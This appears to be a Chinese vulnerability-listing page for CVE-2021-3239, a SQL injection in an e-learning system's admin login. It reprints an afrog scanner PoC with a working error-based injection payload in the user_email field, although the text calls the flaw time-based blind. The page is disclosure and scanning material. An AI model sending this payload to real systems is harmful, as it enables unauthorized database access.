CVE-2021-3239: E-Learning System v1.0 SQL注入基于时间盲注漏洞

日期: 2025-08-01 | 影响软件: E-Learning System | POC: 已公开

漏洞描述

user_email 参数似乎容易受到基于时间的盲注的 SQL 注入攻击。 在 user_email 参数中提交了单引号,并返回了一般错误消息。 然后提交了两个单引号,错误信息就消失了。

PoC代码[已公开]

id: CVE-2021-3239

info:
  name: E-Learning System v1.0 SQL注入基于时间盲注漏洞
  author: nu11secur1ty
  severity: critical
  description: |-
    user_email 参数似乎容易受到基于时间的盲注的 SQL 注入攻击。 在 user_email 参数中提交了单引号,并返回了一般错误消息。 然后提交了两个单引号,错误信息就消失了。
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/janobe/CVE-nu11-101821
    - https://www.tenable.com/security/research/tra-2021-34
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3239
  tags: cve,cve2021,sqli,blind,time-bind
  created: 2023/06/23

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /admin/login.php
      headers:
        Origin: "{{hosturl}}"
        Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
        Referer: "{{hosturl}}/admin/login.php"
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
        Connection: close
        Cache-Control: max-age=0
      body: |
        user_email=QXVzAYzI@nu11secur1tycollaborator.net#'||(SELECT 0x57745147 WHERE 1914=1914 AND (SELECT 7338 FROM(SELECT COUNT(*),CONCAT(0x716a7a7171,(SELECT (ELT(7338=7338,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&user_pass=u0U!y2z!D9&btnLogin=%C2%9E%C3%A9e
    expression: response.status == 200 && response.body.bcontains(b'mysqli_query():')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-3239.yaml

相关漏洞推荐